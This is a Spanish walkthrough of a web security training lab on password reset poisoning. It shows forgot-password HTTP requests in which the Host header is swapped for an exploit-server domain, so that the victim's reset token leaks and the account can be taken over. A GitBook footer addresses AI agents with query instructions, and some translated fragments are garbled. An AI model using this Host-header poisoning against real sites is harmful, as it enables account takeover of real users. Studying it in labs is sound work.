> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/host-header/basic-password-reset-poisoning.md).

# Envenenamiento básico del mecanismo de restablecimiento de contraseñas

### Envenenamiento básico del restablecimiento de contraseña

**Descripción del laboratorio**

Este laboratorio presenta una vulnerabilidad de envenenamiento del proceso de restablecimiento de contraseña. / Usuario **carlos** hace clic sin cautela en todos los enlaces recibidos por correo electrónico.

Objetivo:

* Usa esta falla para recuperar un enlace de restablecimiento válido
* Inicia sesión en **la cuenta de Carlos**

Identificador proporcionado:

* Usuario: **wiener**
* Contraseña: **peter**

Se puede acceder a todos los correos electrónicos enviados a esta cuenta a través del cliente de correo del servidor\*\*.

**Observación inicial**

La aplicación ofrece un \*\*

<figure><img src="/files/bbdf0e4549a02c490662dbaf8286ad30f2f1d212" alt=""><figcaption></figcaption></figure>

Al introducir el `wiener` usuario, se envía correctamente un correo de restablecimiento.

<figure><img src="/files/2b1f07c20409cc30496c1a0187d042680983f3a4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5b0195d5878673febe39c3d9b647d65539b704b1" alt=""><figcaption></figcaption></figure>

**Análisis de la solicitud del backend**

La solicitud HTTP enviada durante la solicitud de restablecimiento es la siguiente:

```http
POST /forgot-password HTTP/2
Host: 0af900f303cc106580bb030b00540086.web-security-academy.net
Cookie: session=Ao8thWvlDIgT46OxVL6hKR8lEBRU9H0i; _lab=46%7cMCwCFBQ4z%2fbgtHq4LZdE21KsQdP7n%2btxAhQUsbbmCpEAs2e6hfs40NpqVQzze60ZABOtmiZENKrkIeRhtjQpq7wGfTR4ACkfX%2fy3xiyS2hre0cnWFJ4KZTfb8HXE5b8FT19JGn3t24n5uFzD7iCcyveBexzEgHZ3I%2fpT%2bPde%2bB%2bkXac%3d
Content-Length: 53

csrf=Tk00wDOWaQI4cw34e6fwZ4dXAlXQhXD7&username=wiener
```

<figure><img src="/files/083724e93e4b102205f97e6aa03880bfd0a04486" alt=""><figcaption></figcaption></figure>

**Prueba de manipulación del encabezado Host**

Al reemplazar el `Host` valor del encabezado con un dominio arbitrario (por ejemplo, `test.com`), el servidor siempre procesa la solicitud como válida y genera el enlace de restablecimiento a partir de este Host modificado.

```http
Host: test.com
```

La página interpreta el contenido de la misma manera que la página normal del host.

<figure><img src="/files/5504c6f1de35f8f78027ce153457afed69a4547f" alt=""><figcaption></figcaption></figure>

Esto confirma una confianza excesiva en el encabezado Host\*\*.

**Explotación de la vulnerabilidad**

El ataque consiste en:

1. Cambia el `Host` encabezado para colocar el dominio**servidor de exploit**
2. Solicitar restablecimiento para el usuario **carlos**

Aplicación:

```http
POST /forgot-password HTTP/2
Host: exploit-0a5c001303a8105f80b302b10120000a.exploit-server.net
Cookie: session=Ao8thWvlDIgT46OxVL6hKR8lEBRU9H0i; _lab=46%7cMCwCFBQ4z%2fbgtHq4LZdE21KsQdP7n%2btxAhQUsbbmCpEAs2e6hfs40NpqVQzze60ZABOtmiZENKrkIeRhtjQpq7wGfTR4ACkfX%2fy3xiyS2hre0cnWFJ4KZTfb8HXE5b8FT19JGn3t24n5uFzD7iCcyveBexzEgHZ3I%2fpT%2bPde%2bB%2bkXac%3d
Content-Length: 53

csrf=Tk00wDOWaQI4cw34e6fwZ4dXAlXQhXD7&username=carlos
```

**Resultado**

* El servidor genera un enlace de restablecimiento basándose en **Host controlado por el atacante**
* Usuario **carlos** haz clic en este enlace trampa recibido por correo electrónico
* El token de restablecimiento queda entonces visible en los registros del servidor de exploits
* Puedes establecer una nueva contraseña para la cuenta **carlos**
* Conexión exitosa a la cuenta objetivo

<figure><img src="/files/97d41900940805b982bcacefcfc7e0155bb74aec" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/host-header/basic-password-reset-poisoning.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
